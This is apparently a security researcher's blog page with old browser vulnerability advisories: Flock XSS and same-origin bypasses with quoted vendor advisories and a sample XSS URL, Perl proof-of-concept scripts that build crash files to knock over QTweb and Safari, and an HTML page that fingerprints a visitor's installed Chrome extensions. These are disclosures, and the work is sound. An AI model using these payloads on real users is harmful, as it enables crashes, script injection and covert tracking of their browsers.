Multiple vulnerabilities in Flock Browser 3.0.0.3989

Friday, March 11, 2011
#########################################
Multiple vulnerabilities in Flock Browser 3.0.0.3989
Vendor URL: http://beta.flock.com/
Vendor Advisores: http://www.flock.com/security/
Advisore:http://lostmon.blogspot.com/2011/03/multiple-vulnerabilities-in-flock.html
Vendor notify:YES exploits availables:YES
#########################################

Some stuff that i don't have published before , because i don't have time , i'm studing and i need time to read books and study.

Flock is faster, simpler, and more friendly. Literally. It's the only sleek, modern web browser with the built-in ability to keep you up-to-date with your Facebook and Twitter friends. This browser version (3.0.0.3989) is based in a old chromium project (5.0.375.75) and has multiple bugs imported from chrome and his owns bugs :) 
I have contributed in secure Flock browser, i have tested version with google chrome  base.
I have do a list with all issues that i found and Flock Team has release some advisores about it time after.

###############
TODO LIST / Bugs
###############
  1.  Inspector window attributes script injection chrome bug 31590
  2.  XSS in search engine in chrome://history/ chrome bug 13760( not exploitable from remote attackers ) (chrome://history/#q="><iframe src=javascript:alert(1)>&p=0)
  3.  XSS in search box in favorites page ( chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title)(not explotable from remote attackers)
  4.  XSS in search engine extension when paste in url (chrome-extension://flock_people/search.html)( persistent xss)(not exploiable from remote attackers)
  5.  XSS in social extension when try to login in facebook or twiter or youtube (not exploitable from remote attackers)
  6.  XSS in rss vienwer in search box chrome-extension://flock_people/feed_viewer.html?http://path_to_rss ( not exploitable from remote attackers)
  7.  XSS in rss viewner when render xml from remote host if the entry has html it is executed when view the news across flock rss viewner(exploitable via remote sites) (see for example my feed => chrome-extension://flock_people/feed_viewer.html?http://lostmon.blogspot.com/atom.xml) and them if you type in search box for example " or < it executes again the xss stored in xml file :) 
  8. window.open() Method Javascript Same-Origin Policy Violation chrome bug 30660  
  9. url with a leading NULL byte can bypass cross origin protection Chrome bug 37383


###########################
Advisores from Flock developers
###########################
FLOCK-SA-2010-04

Title: window.open() Method Javascript Same-Origin Policy Violation (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-0661
Details:
WebCore/bindings/v8/custom/V8DOMWindowCustom.cpp in WebKit before r52401, as used in Google Chrome before 4.0.249.78, allows remote attackers to bypass the Same Origin Policy via vectors involving the window.open method.

Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=32647
http://code.google.com/p/chromium/issues/detail?id=30660

FLOCK-SA-2010-03

Title: javascript: url with a leading NULL byte can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4112
CVEs (cve.mitre.org): CVE-2010-1236

Details:
A javascript: url with a leading NULL byte can bypass cross origin protection,
which has unspecified impact and remote attack vectors.

Credit to kuzzcc (for Chromium) and Lostmon Lords (for Flock).
References: https://bugs.webkit.org/show_bug.cgi?id=35948
http://code.google.com/p/chromium/issues/detail?id=37383

FLOCK-SA-2010-02

Title: A malicious RSS feed can bypass cross origin protection (XSS)
Impact: High
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4114
CVEs (cve.mitre.org): CVE-2010-3262

Details:
A malicious RSS feed containg HTML when viewed can bypass cross-origin protection,
which has unspecified impact and remote attack vectors.
Credit to Lostmon Lords.

FLOCK-SA-2010-01

Title: A malformed favourite can bypass cross origin protection (XSS)
Impact: Moderate
Announced on: 2010-09-09
Affected Products: Flock 3 versions prior to 3.0.0.4094
CVEs (cve.mitre.org): CVE-2010-3202
Details:
A malformed favourite imported from an HTML file, imported from another browser,
or manually created can bypass cross-origin protection, which has unspecified impact
and attack vectors.
Credit to Lostmon Lords.
References: http://www.securityfocus.com/archive/1/513214
################################################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

QTweb browser for windows 3.7(Build 063) CSS Denial of Service

Wednesday, December 08, 2010
#########################################################
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Vendor URL: http://www.qtweb.net/
Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html
Vendor notify: NO exploit available: YES
##########################################################

QTweb browser for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.

The following are vulnerable:

QTweb for windows 3.7(Build 063)


###########
Sample PoC
###########

Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.

#########################################################################
# Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_QTweb.html";
my $junk= "A/" x 20000016;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_QTweb.html File Created successfully\n";
close($FILE);

############################# EOF ############################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Safari for windows 5.0.2(7533.18.5) CSS Denial of Service

#########################################################
Safari for windows 5.0.2(7533.18.5) CSS Denial of Service
Vendor URL:http://www.Apple.com
Advisore:http://lostmon.blogspot.com/2010/12/safari-for-windows-5027533185-css.html
Vendor notify: NO exploit available: YES
##########################################################

Safari for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.

The following are vulnerable:

safari for windows 5.0.2(7533.18.5)


###########
Sample PoC
###########

Generate the Crash file and open it with safari,it hangs and arround one minut it crash
with a anormal program termination.

#########################################################################
# Title: safari for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_safari.html";
my $junk= "A/" x 20000000;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_safari.html File Created successfully\n";
close($FILE);

############################# EOF ############################

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Google Chrome Instaled extensions arbitrary detection

Tuesday, September 07, 2010
######################################################
Google Chrome Instaled extensions arbitrary detection
Vendor url: http://www.google.com
Advisore:http://lostmon.blogspot.com/2010/09/google-chrome-instaled-extensions.html
Vendor notify:YES vendor confirmed.YES exploit:YES
######################################################

Change log :http://googlechromereleases.blogspot.com/2010/09/stable-and-beta-channel-updates.html

#########
Abstract
#########

How safe is use extensions ?
a attacker can access via iframe to resource extensions ( at this moment i
don´t have found a way to altered information from extensions).

like
>iframe
src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/options.html"<>/iframe<
for example...

a remote user can modify this web doc and call it with meta tag "base"
in a malformed doc...

<BASE HREF="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/">
so i thnik that chrome-extension need sanitizacion to don´t access internal
resources from external web pages..( file:/// and other protocols handlers
are safe to use and don´t give access to internal resources from external
web docs...)

So chrome-extension protocol handler can be used to get extensions instaled
on client browser...and them if any extension is vulnerable to something
this information can be used for exploit this extension...

In incognito mode Extensions can be detectable too

###########################
A sample PoC of detection
###########################

<html>
<head>
<title>Chrome extensions detector PoC By Lostmon</title>
<body>
<p><img src="chrome-extension://gffjhibehnempbkeheiccaincokdjbfe/icon_128.png"
onLoad="document.write('<br /><b>you have instaled Gmail checker
plus</b>');" onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bfbameneiokkgbdmiekhjnmfkcnldhhm/icons/16.png"
onLoad="document.write('<br /><b>you have instaled Web Developer</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://bjcpobipejlbogodeiendpdgcdambjgo/icons/icon-lightning-16.png"
onLoad="document.write('<br /><b>you have instaled My Shortcuts</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img src="chrome-extension://bmagokdooijbeehmkpknfglimnifench/firebug.jpg"
onLoad="document.write('<br /><b>you have instaled Firebug</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://ckibcdccnfeookdmbahgiakhnjcddpki/images/browseraction.png"
onLoad="document.write('<br /><b>you have instaled Webpage
Screenshot</b>');" onError="document.write('<br /><b>File not
found</b>');"></p>
<p><img
src="chrome-extension://dgpdioedihjhncjafcpgbbjdpbbkikmi/images/empty_preview.png"
onLoad="document.write('<br /><b>you have instaled Speed dial</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
<p><img
src="chrome-extension://jfchnphgogjhineanplmfkofljiagjfb/icon_16_16.png"
onLoad="document.write('<br /><b>you have instaled Downloads</b>');"
onError="document.write('<br /><b>File not found</b>');"></p>
</body>
</html>

####################EOF##########################

##############
Timeline
##############

Discovered:27 may 2010
Vendor notify:01 jun 2010
Vendor patch:02 sep 2010
disclosure: 07 sep 2010

#######################€ND ########################

Thnx To Climbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends